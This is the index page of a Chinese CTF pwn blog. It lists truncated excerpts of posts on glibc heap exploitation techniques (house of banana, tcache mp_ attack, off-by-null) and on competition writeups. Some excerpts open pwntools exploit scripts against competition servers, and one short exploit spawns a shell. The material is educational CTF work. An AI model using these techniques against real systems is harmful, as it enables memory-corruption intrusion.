avatar
文章
29
标签
44
分类
1

Home
Archives
Tags
Categories
Link
About
Blog of cat03
Home
Archives
Tags
Categories
Link
About

Blog of cat03

house_of_banana源码分析
发表于2021-10-04
House of banana 相较之与 house of orange,house of banana把攻击的焦点转向了ld。其更多地运用于条件极端的情况,如只能申请比较大的块,避开tcache,这时就可以运用这种机制 程序在执行完,或者直接执行exit();时,会进行些资源回收之类的活动,这次要攻击的就是这部分地fini-array,可以这里了解下它的基本知识。 以下的源码来源于glibc2.23 fini-arry中的函数是怎么执行的首先导入源码进行调试 123giles@ubuntu:~/Desktop/house_of_banana $ echo $ELF/home/giles/real_source/glibc-2.23/elfgiles@ubuntu:~/Desktop/house_of_banana $ gdb a.out -d $ELF 接着查看,fini_array的函数,打上断点 12345678910111213141516171819202122232425262728293031323334353637383940414243pwndbg> elfh ...
PWN 快速加载libc
发表于2021-10-02
这个是我自己写的,多少有点偷lemon师傅那个的嫌疑。主要逻辑就是通过shell的一些判断最后组合出那两句命令,好不好用我也不知道,后期有需要会把glibc-all-in-one与之结合,可能更方便些。 patchpwn - A shell script to replace libc of pwn binary in CTFAbstractThis simple shell script is based patchelf and glibc-all-in-one . So , using patchpwn , you need to ensure that you have install them and they are in normal use . UsageBefore specifying the libc version , you should download the libc via glibc-all-in-one, then edit this shell script and replace the LIBC_DIR variable to ada ...
长安杯 绿城杯 DASCTF Sept pwn部分
发表于2021-09-30
我累了,可能也有点xxxx了,我想把眼前的是事情放一放,自由地做些事情把。。。。。。。。。。。 长安杯 别怪我,就做出这一个,不过别人也没把其他的做出来问了师兄,题目来源于Nu1L,最后成绩20多名吧 baigei 算是逻辑上有问题,可以重置size 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687#!/usr/bin/env pythonfrom pwn import *binary = "./main"lib = "./libc-2.27.so"# p = process(binary)p = remote("113.201.14.253","")elf = ELF(binary)libc = ELF(lib)# co ...
长城杯2021pwn
发表于2021-09-20
第一题没学过那种方法,自己打exit_hook花了好久。第二题orw比较简单 K1ng_in_h3Ap_Iexp1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586#!/usr/bin/env pythonfrom pwn import *binary = "./pwn"lib = "/lib/x86_64-linux-gnu/libc.so.6"p = process(binary)p = remote("47.104.175.110","20066")# flag{a3a6d84e-30b3-41ce-a6bc-158e2a975f73}elf = ELF(binary)libc = ELF(lib)# con ...
蓝帽杯PWN
发表于2021-09-17
Coverexp123456789#!/usr/bin/env pythonfrom pwn import *p = process("./pwn")raw_input()payload = p32(0x80484D6+1)payload += "\x30"p.send(payload)p.send("/bin/sh\x00")p.interactive() 本来是想改下一个read()函数的push 0xa,使其栈溢出,但是没达到目的. 之后就转向打plt表了,pus(ptr) -> system(ptr) hangman(绞死那个人)exp1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283#!/usr/bin/env pythonfrom pwn imp ...
byteCTF2020_PWN
发表于2021-09-15
easyheapexp1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283#!/usr/bin/env pythonfrom pwn import *binary = "./easyheap"lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"p = process(binary)elf = ELF(binary)libc = ELF(lib)# context.log_level = "debug"s = lambda buf: p.send(buf)sl = lambda buf: p.sendline(buf)sa = lambda delim, buf: p.sendafter(delim, buf)sal = lambd ...
tcache之攻击mp_及源码分析
发表于2021-09-08
tcache之攻击mp_ 如果程序强迫只能申请大块的chunk,通过largebin attack,或unsortedbin attack,能将变量修改成较大的值,却难以申请到libc,而本文描述的方法会强制大块的申请也通过tcache进行get,put,这样也就可利用tcache的攻击手法,去申请libc空间 tip:下面源代码来源于glibc2.31 1234567891011121314151617181920212223242526272829303132333435363738394041# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)# define MAYBE_INIT_TCACHE() \ if (__glibc_unlikely (tcache == NULL)) \ tcache_init();static __always_inline void *tcache_get (size_t tc_idx){ tcache_entry ...
fastbin size错位构造及源码分析
发表于2021-09-04|pwn
fastbin size错位构造 这个主要是较之于tcache修改fd指针为libc区域 直接就能申请到那段空间而在glibc2.23中没有tcache。但是也可通过在libc区域错位构造size,来申请那段空间 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152/* offset 2 to use otherwise unindexable first 2 bins */#define fastbin_index(sz) \ ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)static void *_int_malloc (mstate av, size_t bytes){ ... if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { idx = f ...
祥云杯pwn
发表于2021-09-02
Note 由于没有free就按着house_of_orange那一套打的 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106#!/usr/bin/env pythonfrom pwn import *re = 1context.log_level = "debug"if re: p = remote("47.104.70.90", "25315") libc = ELF("./libc-2.23.so")else: binary = "./note" p = process(binary) lib = "/lib ...
off_by_null源码分析
发表于2021-08-28|pwn
off by null第一种利用方式123456789101112131415161718192021222324252627282930313233343536#include <stdio.h>#include <stdlib.h>#include <stdint.h>#include <assert.h>int main(){ uint8_t* t1; uint8_t* t2; uint8_t* b1; uint8_t* b2; uint8_t* A = malloc(0x18); uint8_t* B = malloc(0x100); uint8_t* C = malloc(0x100); malloc(0);//barriar *(uint64_t*)(B+0xf0) = 0x100; free(B); A[0x18] = 0x00; // off by null b1 = malloc(0x88); b2 = malloc(0x18); free(b1); free(C); //trigger t1 = mal ...
123
avatar
cat03
九层之台,起于累土。
文章
29
标签
44
分类
1
Follow Me
公告
因为自己比较笨,又老是爱忘事,就想着弄个博客
最新文章
NOTES2098-11-30
userfaultfd2022-03-13
2021-西湖论剑-PWN & 2021-BCTF-PWN2022-01-17
编写自己的驱动2022-01-12
SCTF-PWN2022-01-10
分类
  • pwn8
标签
2.23攻_IO_stdout 32位pwn 64位格式化字符串 Glibc2.31 ORW NULL_change ORW c++ pwn double_free exit_hook fastbin fastbin_double_free glibc源码 house_of_orange how2heap io kernel kernel uaf kmalloc-xx largebin attack modprobe_path new 和 delete off by null off by one off_by_null patch libc plt表 pwn ret2csu seccomp shellcode size错位 ssp leak stack overflow string类 switch表修复 uffd unlink vector类 堆喷 栈迁移
归档
  • 十一月 20981
  • 三月 20221
  • 一月 20225
  • 十二月 20211
  • 十月 20214
  • 九月 20217
  • 八月 20216
  • 七月 20214
网站资讯
文章数目 :
29
本站总字数 :
52.8k
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2022 By cat03
框架 Hexo|主题 Butterfly